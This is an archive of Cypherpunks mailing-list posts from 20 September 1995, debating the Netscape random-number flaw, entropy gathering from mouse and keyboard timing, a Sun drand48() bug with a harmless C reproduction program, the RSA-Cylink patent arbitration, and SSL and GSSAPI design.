> -Paul

Some pin stripping and a spot of tomato soup.. (sorry.. couldn't pass it up..

From perry at piermont.com Wed Sep 20 08:07:08 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 08:07:08 PDT
Subject: My Day
In-Reply-To: <9509201248.AA09892@alpha>
Message-ID: <199509201506.LAA05066@frankenstein.piermont.com>

Mike McNally writes:
> Also (and note that it's been a while since I've messed around with
> PC's, but since the "architecture" remains chained to an early-80's
> design I suspect they're still the same) the PC clock frequency is
> generally pretty low.

No, it isn't actually. You can get a microsecond timer out of it. The clock interrupts occur only infrequently, but the clock chip itself increments very very fast, and if you wanted microsecond timings of keystrokes there are registers that will give you what you want.

Perry

From jamesd at echeque.com Wed Sep 20 08:09:51 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 20 Sep 95 08:09:51 PDT
Subject: No Subject
Message-ID: <199509201509.IAA19829@blob.best.net>

At 5:53 AM 9/20/95, Jeff Weinstein wrote:
> This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we

Maintain a 4K entropy buffer. Mingle the exact time and place of each mouse hit into the entropy buffer using some combination that will have the effect of progressively shifting bits all over the place, so that every noise bit that you get eventually affects every bit of the buffer in a complicated way.
For example:

    Buf[p] = MouseNoise + Buf[p] + Buf[p-24] + Buf[p-55];
    p = p+1;

(See Knuth, Seminumerical Algorithms, Book 2, page 27 for the magic properties of the numbers 24, 55. This rule means that the buffer immediately before p depends in a non-linear fashion on all the noise you have received.)

Whenever you need a random number, take a one way checksum, for example MD5, of the most recently altered part of that buffer. Use that as your random number.

Whenever the user has used this buffer during a session, then when he quits netscape, save the buffer after first hashing it. To hash the buffer without loss of entropy, take the hash of one block of the buffer, and XOR it onto the next block (not the block that you hashed.) Repeat for each block in the buffer cyclically.

Publish your random number and encryption code here and in sci.crypt.

---------------------------------------------------------------------
 We have the right to defend ourselves  |  http://www.jim.com/jamesd/
 and our property, because of the kind  |
 of animals that we are. True law       |  James A. Donald
 derives from this right, not from the  |
 arbitrary power of the state.          |  jamesd at echeque.com

From rah at shipwright.com Wed Sep 20 08:18:15 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 20 Sep 95 08:18:15 PDT
Subject: Security Flaw Is Discovered In Software Used in Shopping
Message-ID:

--- begin forwarded text

Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT)
From: Nathaniel Borenstein
To: www-buyinfo at allegra.att.com
Subject: Re: Security Flaw Is Discovered In Software Used in Shopping

Without belaboring the point too much, I think there are a few conclusions that really ought to be drawn:

-- The world has never seen unbreakable encryption software, and almost certainly never will. Nothing that human beings ever build is perfect.

-- Any encryption-based scheme is only as strong as its weakest link. Generally, you don't know what the weakest link will turn out to be.
-- Basing a global financial infrastructure on the unbreakability of a certain algorithm or program is at best imprudent. Bear in mind that people as well respected as Dr. Adelman -- the "A" in RSA -- are hard at work trying to figure out how, for example, to use massive parallelism to break the basic algorithms of public key cryptography.

-- Keeping sensitive financial information completely off the net is always best, whether or not you are using encryption. For information on a safe, non-cryptographic alternative that has been fully operational for nearly a year, with over 30,000 paying customers, a growth rate featuring a six week doubling period, and NO break-ins to date, check out http://www.fv.com.

-- Nathaniel

--------
Nathaniel S. Borenstein                 | When privacy is outlawed,
Chief Scientist, First Virtual Holdings | only outlaws will have privacy!
FAQ & PGP key: nsb+faq at nsb.fv.com    | SUPPORT THE ZIMMERMANN DEFENSE FUND!
---VIRTUAL YELLOW RIBBON-->> zldf at clark.net

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA
(617) 323-7923
"Reality is not optional."
--Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From liberty at gate.net Wed Sep 20 08:22:32 1995
From: liberty at gate.net (Jim Ray)
Date: Wed, 20 Sep 95 08:22:32 PDT
Subject: USA Today on Fear of Credit Cards over Net
Message-ID: <199509201518.LAA78249@tequesta.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----

> How much do PC users trust:
>
> Automatic teller machines                          77%
> Banking by phone                                   62%
> Banking by computer                                57%
> Using a credit card or calling
>   card at a public phone                           57%
> Writing a credit-card number on
>   a catalog order form                             43%
> Sending a credit-card number to
>   a commercial on-line service                     34%
> Giving a credit-card number
>   over the phone                                   31%
> Sending a credit-card number
>   over the Internet                                 5%
>
> (margin of error = +/- 4.7%)

Pity they didn't ask about, "Tossing a credit card slip/carbon in the garbage." Dumpster-diving is still an effective, lo-tech attack.

JMR

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMGAxQW1lp8bpvW01AQEfmwP9GfEzhoBWuTNHvxZ7dMvMV7K/cypT0XmO
kLqAAtPHyhS3PxmwNiT0G4tquU9QHw2cQ5Rj6IAqR7Fbuvtt1TW2Kora9RsXLp5L
75Zw63/wrsnI20qe+Pnf6FEG0IcjLg4vrezhAGYAC3zSdTpSW4cuqdzId6qeTlvM
4gg2Z9UGOrA=
=ReYK
-----END PGP SIGNATURE-----

Regards, Jim Ray

"Not everything that is faced can be changed, but nothing can be changed until it is faced." -- James Baldwin
-----------------------------------------------------------------------
PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
Key id. # E9BD6D35                                     James Milton Ray
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________

From goedel at tezcat.com Wed Sep 20 08:28:30 1995
From: goedel at tezcat.com (Dietrich J.
Kappe)
Date: Wed, 20 Sep 95 08:28:30 PDT
Subject: Cypherpunks Press release
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

We've seen the word "hacker" kicked around rather arbitrarily in the press. Are we to conclude that the cypherpunks are a bunch of hackers? I think it's time for some cypherpunks spin. How about a logo *and* a press release? The press release would give contacts (email, phone, etc.) so that someone on this list would be contacted by journalists when a crypto story breaks.

If we get enough volunteers, we can fax blanket every newspaper, station, and network in the world.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMGBA2XIf3YegbdiBAQG0RQJXdWG0beFoFEk6BfEkhIDYxB6NsbSSIGWe
Nzob7W7Gd/YyRqsVhU5T8jQEpD6sNLwTP+4SypSC9Mk8EauKAvklHkkfGr53scQh
5Tzp
=Fxdn
-----END PGP SIGNATURE-----

Dietrich Kappe   | Red Planet http://www.redweb.com
Red Planet, LLC  | "Chess Space" | "MS Access Products" | PGP Public Key
1-800-RED 0 WEB  | /chess        | /cobre               | /goedel/key.txt
Web Publishing   | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From akjoele at shiva.ee.siue.edu Wed Sep 20 08:38:52 1995
From: akjoele at shiva.ee.siue.edu (Arve Kjoelen)
Date: Wed, 20 Sep 95 08:38:52 PDT
Subject: drand48() bug
Message-ID: <199509201538.KAA28316@shiva.ee.siue.edu>

-----BEGIN PGP SIGNED MESSAGE-----

jws at neon.netscape.com writes:
> Most of the unix machines do the same thing. On SGI machines
> that have the hardware cycle counter, its value is used in place of the
> srand48(usec), lrand48() sequence. BSDI the code used srandom and random.

Kun Luo, one of our grad students here recently found a bug in Sun's implementation of the drand48() function. We reported it to Sun, and they acknowledged the bug exists - it seemed to be the first time they had heard of it, though.
The bug affects Sun's ANSI C compiler shipped with SPARCWorks3.0 and consists of the following: If you're compiling using the -Xc flag (strict ANSI C, no SUN C compatibility extensions), the function drand48() is BROKEN. It ALWAYS returns the number 9.000000, no matter what you seeded it with using srand48().

To reproduce, compile the following program under Solaris 2.x using their C compiler AND the -Xc flag:

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    int main(void)
    {
        double number;
        int num = 1000;

        /* seed the 48-bit generator from the clock; srand48() takes a long */
        srand48((long)time(NULL));

        /* print 1000 draws; a correct drand48() returns values in [0.0, 1.0) */
        while (num--) {
            number = drand48();
            printf("%lf\n", number);
        }
        return 0;
    }

By the way, Cypherpunks mail seems to indicate that Netscape uses lrand48() instead of drand48(). lrand48() is NOT broken. The potential for disaster is high, though, for anyone blindly trusting vendor-provided pseudo-random number generators. How many products are out there using drand48() as part of their random number generation scheme?

-Arve

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAvqdwAAAEEAKRdBFn7O/h+wz3tOQwHWvaFKS6gi+UezzCXli/QnuCrJcUE
agvlVVZ/PzKG5i23VdbghyHsVElvKzRW/D1pYor6xSluCftXzSxbCuiEIe2SXUsH
65AqFN688upXzRKHcq3bU/eKB7xUOGqCDot8AzModnwE+XWCgdqn8CTZCNGhAAUR
tCJBcnZlIEtqb2VsZW4gPGFram9lbGVAZWUuc2l1ZS5lZHU+
=csFb
-----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBMGAusNqn8CTZCNGhAQEYdQP4+UGvLJKoQPWPLFMENDIPY1QSIuQdQxdt
fTzWRNXsPadE4N40bHgucqZQG8Ze55JsKIrrhL9RZFIVx+ygxsmsSHsocu/kFbSW
E7RNWMvoaoRAmB4KkWF+ofqRWl9Qo+r00CvgX1brsOdpjySVIkxml8/L7R/RBuQL
aFNV5OBz2w==
=saUT
-----END PGP SIGNATURE-----

From iang at CS.Berkeley.EDU Wed Sep 20 08:49:11 1995
From: iang at CS.Berkeley.EDU (Ian Goldberg)
Date: Wed, 20 Sep 95 08:49:11 PDT
Subject: Munitions shirt (again)
Message-ID: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>

So, Dave and I got free munitions shirts (they're different, though; the font is smaller and they have a bunch of X'd out Constitutional Amendments on the back; I think they were designed by Joel Furr) for our
bug find. So I'm wearing it today. The thing is, I live in International House, a residence that has 50% non-Americans. So, any consensus as to whether it's actually illegal to do so? I remember some disagreement a few weeks ago that AFAIK wasn't resolved. As far as I can tell, it's _technically_ illegal, but any LEO would be out of his mind to try to enforce it (it would have to be a Fed, too, wouldn't it? Or can regular city cops get you for violating export restrictions?).

- Ian

From sunder at dorsai.dorsai.org Wed Sep 20 08:52:51 1995
From: sunder at dorsai.dorsai.org (Ray Arachelian)
Date: Wed, 20 Sep 95 08:52:51 PDT
Subject: Time release crypto
In-Reply-To: <199509190930.CAA24047@ix.ix.netcom.com>
Message-ID:

On Tue, 19 Sep 1995, Bill Stewart wrote:
> Technology can't solve the problem, only help a bit; algorithms
> aren't timebound. In particular, true security depends on only
> being able to decrypt if you have the correct information, and there's
> no way to create decryption information in the future from
> encryption pieces you have now without being able to create the
> same information now.

Some of the following is probably idiotically obvious, but to prevent an attack on such a time keeper, it could be tied in to the atomic clocks, it could poll several PC's and check their time... any significant major time change would be spotted immediately... that is you couldn't possibly change the time on many machines at the same time without having physical access to all the machines, etc. Altering the time on an atomic clock would be visible to just about everyone, etc.

This in no way would prevent an attacker from stealing the passphrase to the time signing service, so it wouldn't prevent anyone from issuing false keys. But by using a hardware random generator the time keeping service could know if it issued a key or not by storing all the keys it issued previously.
This would achieve the following: even if a thief stole the key, with enough randomization, the stolen keys would show up as valid, but would not show up in the time server's database - which should be written to write-once media such as WORM, or CDROM, etc... the stolen key would generate valid time signatures, but would not be on the database, so it would be clear it was forged. To get around this, the bad guy would need constant physical access to the time keeper, not just a single black bag job. This also means that this database must be publicly searchable at all times.

Perhaps the generator passphrase should also be changed randomly as time passes - but then these things too would have to be stored somewhere before the time the key expires...

This is probably a bit far fetched, but the time keeper could be tied into astronomical events - that is have it follow the path of planets, star systems, etc. and derive time that way and compare it with what time it thinks it is. This would require quite a lot of sensors and extra hardware to track stars, planets, etc... The bad guy would have to do a lot more work to get around this... basically what you want to do is track some totally unalterable event to keep track of time, and we presume the NSA cannot change the orbits of planets... yet. ;-)

Another method would be to set up a key breaking system which would accept weaker keys - say 300 bits or so, and start breaking them. This wouldn't guarantee they wouldn't be broken before such and such time, and wouldn't prevent anyone from running their own on faster hardware, or building special hardware optimized to break it faster though... but without the private key, the only way to break it would be to brute force it.

==========================================================================
 + ^ + |  Ray Arachelian   | Amerika: The land of the Freeh.  | _ |>
  \|/  |sunder at dorsai.org| Where day by day, yet another    | \ |
<--+-->|                   | Constitutional right vanishes.   |
                                                             |  \|
  /|\  |    Just Say       |                                  | <|\
 + v + | "No" to the NSA!  | Jail the censor, not the author! |  <| n
==========================================================================

From baldwin at RSA.COM Wed Sep 20 08:56:44 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Wed, 20 Sep 95 08:56:44 PDT
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID: <9508208116.AA811612567@snail.rsa.com>

Here's an article on the RSA-Cylink arbitration from the business wire.
--Bob Baldwin

-----------------------------

RSA Prevails In Arbitration Against Cylink

REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel recently ruled that Cylink does not have a license to RSA patented technology, that RSA's software licensing practices do not breach any agreement with Cylink or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive right to license the RSA patent.

In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the parties, and after nearly a month of testimony, ruled in favor of RSA on every significant issue. The Panel held that neither Cylink nor Caro-Kann had a license to practice RSA patented technology. Cylink admittedly incorporates this technology in its Secure X.25 product line, without any license to do so. The Panel also found that RSA's software licensing practices did not materially breach any of Cylink's rights. The Panel did not rule that anyone, (specifically including RSA and its software customers) infringed any existing patent rights of anyone - including Cylink.

As a result of the Panel's ruling, RSA now has the exclusive right to license the patented RSA technology. According to Jim Bidzos, the President of RSA, `RSA will continue to conduct its software business in exactly the same way that it has for the past ten years.
`In addition, RSA anticipates that licenses to the RSA Patent will now be much more readily available, because they can now be granted without Cylink interference. RSA has all of the intellectual property rights which it needs to license its software. RSA will vigorously defend against any claim to the contrary.`

A recent Cylink press release on the Ruling of the Arbitration Panel is wildly inaccurate. The same Robert Fougner (Cylink's General Counsel) who is cited in the Cylink press release has repeatedly made express representations to third parties that the Stanford Patents do not cover, and are not infringed by, the manufacture, use or sale of products incorporating RSA's TIPEM software developer's toolkit.

As noted by Mr. Bidzos: `Cylink lost every single significant issue in the Arbitration. Their press release was simply an attempt to cover up what has been a crushing defeat.`

Questions regarding the Arbitration Panel Ruling or RSA licenses should be directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay, RSA Director of Legal Affairs.

CONTACT: RSA
         Kurt Stammberger, 415/595-8782
         kurt at rsa.com

From khijol!erc Wed Sep 20 08:58:33 1995
From: khijol!erc (Ed Carp [khijol SysAdmin])
Date: Wed, 20 Sep 95 08:58:33 PDT
Subject: My Day
In-Reply-To: <199509201218.MAA00433@orchard.medford.ma.us>
Message-ID: <199509201411.JAA04860@khijol>

-----BEGIN PGP SIGNED MESSAGE-----

> Getting real entropy from mouse movements under X may be tricky,
> because the X server goes out of its way to compress mouse movement
> reporting and to buffer events sent to the client ("X is an exercise
> in avoiding system calls"). You'll probably get less entropy than you
> might think.

Also add that many people seem to tend to swirl the mouse in fast circles, where there isn't *any* latency between mouse movements, and you get even less entropy.
I suspect that Colin Plumb's code, while a nice try, would be a bit less useful than might have been otherwise suspected.

--
Ed Carp, N7EKG
Ed.Carp at linux.org, ecarp at netcom.com
214/993-3935 voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key
an88744 at anon.penet.fi

Q. What's the trouble with writing an MS-DOS program to emulate Clinton?
A. Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGAhFSS9AwzY9LDxAQF/oAP/TrE912Sy8DqTG2oQQ3bgK//5bPGmoX1h
cVS4uwSrSJ+wdkkvExZV1I3eqkQCJEkZjsJp83ZtOD44nxOd9aDiY+XuarVU8UDW
f/9oPtYCjDU2MPD+Tu4ftL9I5B0WqT+V/4RAkvwPdqNnzqgNiCTIdPwEOHp+gNl2
Cv3/3e6/Bh4=
=pvSP
-----END PGP SIGNATURE-----

From rrothenb at ic.sunysb.edu Wed Sep 20 09:05:53 1995
From: rrothenb at ic.sunysb.edu (Deranged Mutant)
Date: Wed, 20 Sep 95 09:05:53 PDT
Subject: Silly NetScape RND tricks...
Message-ID: <199509201605.MAA07035@libws3.ic.sunysb.edu>

I've only been skimming the NetScape-related posts lately, but I've yet to see anyone mention using a keyboard-timing sampler as a source for some random bits... I believe this is still a workable solution even in Windows, though probably not as 'precise' as if it were run from DOS.

Any comments?

From patrick at Verity.COM Wed Sep 20 09:07:16 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:07:16 PDT
Subject: netscape's response
Message-ID: <9509201603.AA13810@cantina.verity.com>

> This is not to say that I think *you* are bad at this, Mr. Weinstein,
> but you certainly have colleagues with the worst possible track record.
>
> Perry
>

How can you say worst possible...have you forgotten Eric Allman? Wouldn't it be fun to try to come up with the 5 worst programmers (as far as sloppy security holes go). Eric completely revamped sendmail to make V8 and put in new holes in some of the same categories as some of the well known old holes:(

I'm glad my code isn't held up to such public scrutiny after it's released!
I'm doing some security/crypto stuff soon for my current employer and I'll run my design by some of you. I'll run the code by as well if I can get my bosses to agree.

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
|      (\                                                               |
| Patrick J. Horgan         Verity Inc.                 \\      Have    |
| patrick at verity.com       1550 Plymouth Street         \\ _   Sword   |
| Phone : (415)960-7600     Mountain View                \\/    Will   |
| FAX   : (415)960-7750     California 94303            _/\\   Travel  |
\___________________________________________________________\)__________/

From bianco at itribe.net Wed Sep 20 09:10:09 1995
From: bianco at itribe.net (David J. Bianco)
Date: Wed, 20 Sep 95 09:10:09 PDT
Subject: Cypherpunks Press release
In-Reply-To:
Message-ID: <199509201607.MAA19722@gatekeeper.itribe.net>

On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail archives:
> Subject: Cypherpunks Press release
|| -----BEGIN PGP SIGNED MESSAGE-----
||
|| We've seen the word "hacker" kicked around rather arbitrarily in the press.
|| Are we to conclude that the cypherpunks are a bunch of hackers? I think its
|| time for some cypherpunks spin. How about a logo *and* a press release? The
|| press release would give contacts (email, phone, etc.) so that someone on
|| this list would be contacted by journalists when a crypto story breaks.
||
|| If we get enough volunteers, we can fax blanket every newspaper, station,
|| and network in the world.
||

I think it's a great idea, personally. I think many journalists would like to find third party opinions about network security and other cryptography issues, but just don't know who to talk to about them. By making it easy for them to find us, we'd be more likely to be consulted for opinions.

I'd be willing to serve as a contact for my area (Southeastern Virginia) if anyone wants to start putting together such a list.
--
==========================================================================
David J. Bianco                    | Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.                       | Phone: (804) 446-9060
Suite 1700, World Trade Center     | email:
Norfolk, VA 23510                  | URL  : http://www.itribe.net/~bianco/

From patrick at Verity.COM Wed Sep 20 09:15:45 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:15:45 PDT
Subject: MIME
Message-ID: <9509201612.AA13835@cantina.verity.com>

> : Content-Type: application/pgp
> : Content-Transfer-Encoding: 7bit
> : Sender: owner-cypherpunks at toad.com
> : Precedence: bulk
> : Content-Length: 1092
>
> I think that it must be the content-type that is causing problems, as
> the rest of the message is completely standard. To the people whose
> mailers broke out in hives at that message: Do you get the same behavior
> with any message having an unknown content-type?
> --
> Shields.
>

I've only ever seen the problem with Content-Type: application/pgp using Sun's mailtool. I don't know that I've ever gotten mail with unknown Content-Type though...wait let me whip some up...

Mailtool assumes anything with a content type is an attachment. The type is used as the name of the attachment. A Content-Type: of application/foo or of just foo both yield an attachment named foo.

Patrick

 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).  \
|      (\                                                               |
| Patrick J. Horgan         Verity Inc.                 \\      Have    |
| patrick at verity.com       1550 Plymouth Street         \\ _   Sword   |
| Phone : (415)960-7600     Mountain View                \\/    Will   |
| FAX   : (415)960-7750     California 94303            _/\\   Travel  |
\___________________________________________________________\)__________/

From rsalz at osf.org Wed Sep 20 09:23:33 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 20 Sep 95 09:23:33 PDT
Subject: Please send me SSL problems...
Message-ID: <9509201622.AA19050@sulphur.osf.org>

> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs ...
> The IETF quite explicitly doesn't care about APIs

With one exception so important that it might blow away your whole complaint...

...GSSAPI.
        /r$

From rsalz at osf.org Wed Sep 20 09:32:31 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 20 Sep 95 09:32:31 PDT
Subject: NYT on Netscape Crack
Message-ID: <9509201631.AA19151@sulphur.osf.org>

> You could do that, but thats not how C does things. C allocates these
> things on the stack.

Nope. Just because almost all machines anyone is ever going to use in their lifetimes are stack-based doesn't mean C is stack-based. The C compiler I once used on a LispMachine had no stack.
        /r$

From rsalz at osf.org Wed Sep 20 09:34:15 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 20 Sep 95 09:34:15 PDT
Subject: Why couldn't it have been 42?
Message-ID: <9509201633.AA19179@sulphur.osf.org>

[drand48 is supposed to return a random number]

From: Arve Kjoelen
To: cypherpunks at toad.com
Date: Wed, 20 Sep 1995 10:38:58 -0500

Kun Luo, one of our grad students here recently found a bug in Sun's implementation of the drand48() function. We reported it to Sun, and they acknowledged the bug exists - it seemed to be the first time they had heard of it, though.

The bug affects Sun's ANSI C compiler shipped with SPARCWorks3.0 and consists of the following: If you're compiling using the -Xc flag (strict ANSI C, no SUN C compatibility extensions), the function drand48() is BROKEN. It ALWAYS returns the number 9.000000 ...

From perry at piermont.com Wed Sep 20 09:39:46 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 20 Sep 95 09:39:46 PDT
Subject: NYT on Netscape Crack
In-Reply-To: <9509201631.AA19151@sulphur.osf.org>
Message-ID: <199509201639.MAA05261@frankenstein.piermont.com>

Rich Salz writes:
> > You could do that, but thats not how C does things.
> > C allocates these
> > things on the stack.
>
> Nope. Just because almost all machines anyone is every going to use
> in their lifetimes are stack-based doesn't mean C is stack-based.

Effectively the same thing for our purposes, neh?

.pm

From norm at netcom.com Wed Sep 20 09:43:46 1995
From: norm at netcom.com (Norman Hardy)
Date: Wed, 20 Sep 95 09:43:46 PDT
Subject: NSA and Netscape Crack
Message-ID:

At 3:46 PM 9/19/95, Jim Ray wrote:
....
>I don't expect to know NSA's specific brute-force capability, but
>does anyone know if the NSA has *ever* found a glaring weakness in
>software and then told its author(s) or owner(s) about it? Do "we"
>perform the "COMSEC" role Tim was speaking of better than the NSA?
>JMR
....

Once upon a time NSA would find weaknesses in friends' crypto systems and tell them about it -- depending, of course, on the situation. It was a reciprocal practice. We don't know that NSA didn't tell Netscape.

From thad at hammerhead.com Wed Sep 20 09:44:11 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Wed, 20 Sep 95 09:44:11 PDT
Subject: No Subject
Message-ID: <199509201630.JAA01430@hammerhead.com>

I talked to somebody from RSA yesterday, and she said that they issued a press release yesterday that she expected to see in the papers today (I didn't see it) and would be on their web site "soon" that would explain their position. They say that the arbitration agreement maintains the status quo pretty much, and while it doesn't limit what RSA can do, it severely limits what Cylink can do.

I think that what RSA needs to do is hire Cylink's PR agency...

thad
--
Thaddeus Beier                 email: thad at hammerhead.com
Technology Development         vox: 408) 286-3376
Hammerhead Productions         fax: 408) 292-8624

From frissell at panix.com Wed Sep 20 09:48:21 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 20 Sep 95 09:48:21 PDT
Subject: FROM A FRIEND . . .
Message-ID: <199509201648.MAA14624@panix.com>

>Updating Customers:
>Netscape will provide the fix for Export (40 bit) versions of Netscape
>Navigator later this week for downloading by customers on the Internet.
>Similarly, the
>Commerce Server patch for Export versions (40 bit) will be made available
>from our home page. Because downloading of 128 bit versions of the software
>is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
>Netscape Navigator Personal Edition and Netscape Commerce Server using 128
>bit versions can request the replacement from Netscape for delivery through
>the regular mail.

Funny, MIT and MPJ and others manage to enable the downloading of export-controlled software.

Also, wasn't there some sort of promise by Netscape after we broke the 40-bit version to make the 128-bit version available to US users under the Beta/freeware system? What happened to that plan?

DCF

"This encryption thing is a lot harder than it looks."

From kinney at bogart.Colorado.EDU Wed Sep 20 09:48:46 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Wed, 20 Sep 95 09:48:46 PDT
Subject: My Day
In-Reply-To: <199509201411.JAA04860@khijol>
Message-ID: <199509201648.KAA11790@bogart.Colorado.EDU>

Ed Carp writes:
> Also add that many people seem to tend to swirl the mouse in fast circles,
> where there isn't *any* latency between mouse movements, and you get even
> less entropy. I suspect that Colin Plumb's code, while a nice try, would
> be a bit less useful that might have been otherwise suspected.

Colin's code, independent of implementation, simply uses MD5 as a block cipher to "launder" bit-streams that contain non-uniform distributions of true random data. See "Truly Random Numbers" in Dr. Dobb's Journal, November 1994, p. 113. How much entropy you get out depends entirely on what you feed in.

I've put my code up on the cypherpunks ftp site, but I'm still waiting to hear back from the site maintainers as to its final location.
In any case, that code uses the mouse _position_ and system timings in microseconds as input to the MD5 engine. So swirling the mouse should provide a good source of random input, better the faster it's moved.

However, any code that generates random session keys should properly include routines to estimate the amount of entropy collected, and not generate a 128-bit key until at least 128 bits of entropy have been fed into the pool. This is a non-trivial problem, although PGP makes a good stab at it. To my knowledge, CryptDisk does not include this feature, and really ought to. For my own purposes in Curve Encrypt, this is not necessary, since I don't generate session keys, only salts.

-- Will

From raph at CS.Berkeley.EDU Wed Sep 20 10:08:44 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Wed, 20 Sep 95 10:08:44 PDT
Subject: Hypermail gateway
Message-ID: <199509201708.KAA00091@kiwi.cs.berkeley.edu>

Yesterday, I started a new hypermail gateway at: http://kiwi.cs.berkeley.edu/~cpunks/

Please try not to overload the site; it's a research machine.

Raph

From fair at clock.org Wed Sep 20 10:09:50 1995
From: fair at clock.org (Erik E. Fair (Time Keeper))
Date: Wed, 20 Sep 95 10:09:50 PDT
Subject: Please send me SSL problems...
Message-ID:

At 9:22 9/20/95, Rich Salz wrote:
>> Jeff, the SSL specification has a severe *architectural* problem - it
>> assumes that Internet Protocols are APIs ...
>> The IETF quite explicitly doesn't care about APIs
>
>With one exception so important that it might blow away your whole
>complaint...
>
>...GSSAPI.
> /r$

And we see how far *that* effort has gotten...

There was some discussion in Toronto last summer about APIs for the basic transports (i.e. standardizing "sockets", or TLI, or whatever), which got backed off to a list of "required service elements" that a good stack vendor should make available to the app programmers, and then the whole notion got killed off for the reasons I cited.
GSSAPI was an attempt to make it easy to slide in authentication & encryption into existing software - lay a foundation for real security in the applications. A fine goal, but a bad plan for achieving the goal. I think they were also trying to avoid blessing any particular crypto scheme, to avoid both the export morass, and the patent morass - "we'll drop in whatever we can get on good terms, later."

API and interface standards are to be avoided in part because of the reasons I cited previously, in part because they're hard to do right for all platforms (not everyone uses function-call style system/library calls), and in part because they do not guarantee you interoperability - classic case in point is the Microsoft Mail API (MAPI): you can put *anything* under MAPI: Novell MHS, cc:Mail, QuickMail, or SMTP, just to name a few. If you are not speaking the same wire protocol as your intended correspondent (or peer), you lose, regardless of the fact that your software and hers are both using the same API - you cannot interoperate.

What really annoys me is the fuss you see in the trade rags about "middleware" these days; they've missed this entire point about interfaces versus protocols, and they're propagating the misconception that interfaces give interoperability to the general marketplace. And the vendors are laughing all the way to the bank.

Erik Fair

From sameer at c2.org Wed Sep 20 10:11:43 1995
From: sameer at c2.org (sameer)
Date: Wed, 20 Sep 95 10:11:43 PDT
Subject: My Day
In-Reply-To: <199509201648.KAA11790@bogart.Colorado.EDU>
Message-ID: <199509201706.KAA02759@infinity.c2.org>

> I've put my code up on the cypherpunks ftp site, but I'm still waiting to
> hear back from the site maintainers as to its final location. In any case,
> that code uses the mouse _position_ and system timings in microseconds as
> input to the MD5 engine. So swirling the mouse should provide a good source
> of random input, better the faster it's moved.
>

Did you send mail to cypherpunks-ftp at csua.berkeley.edu ?

/pub/cypherpunks/randomness

-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org

From rsalz at osf.org Wed Sep 20 10:15:55 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 20 Sep 95 10:15:55 PDT
Subject: Please send me SSL problems...
Message-ID: <9509201715.AA19393@sulphur.osf.org>

From what I can see, GSSAPI has broad acceptance and will soon have broad use. I've heard that Digital, HP, and IBM have all mandated that all security code (except keymgmt and other things that are out of scope) must go through the GSSAPI: no writing your own stuff. I heard, less authoritatively, that Microsoft has the same rules, except they use a FunnyLookingVariant(far) of an earlier GSSAPI draft.

/r$

From futplex at pseudonym.com Wed Sep 20 10:21:40 1995
From: futplex at pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 10:21:40 PDT
Subject: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <43o23b$91r@calum.csclub.uwaterloo.ca>
Message-ID: <9509201721.AA07110@cs.umass.edu>

David Clavadetscher of PrivaSoft writes:
> At this time our crypto engine is patented and proprietary.

Ian Goldberg writes:
> Waitasec... I was under the impression that if you patented it, you had to
> reveal it. That's why RC4 isn't patented (it used to be a trade secret).

I think I have figured out now what Clavadetscher meant. According to the PrivaSoft home page, the product uses "bitmap encryption". Inspired by your mention of patents being published, I sought a relevant patent, and I believe I've found it. U.S. Patent 5,321,749 was issued to a Richard Virga of Danbury, CT in 1994. It describes a protocol for representing an arbitrary fax document as a bitmap, encrypting it, and encoding it for transmission. The user inputs a password (4-20 characters) to be used as a session key.
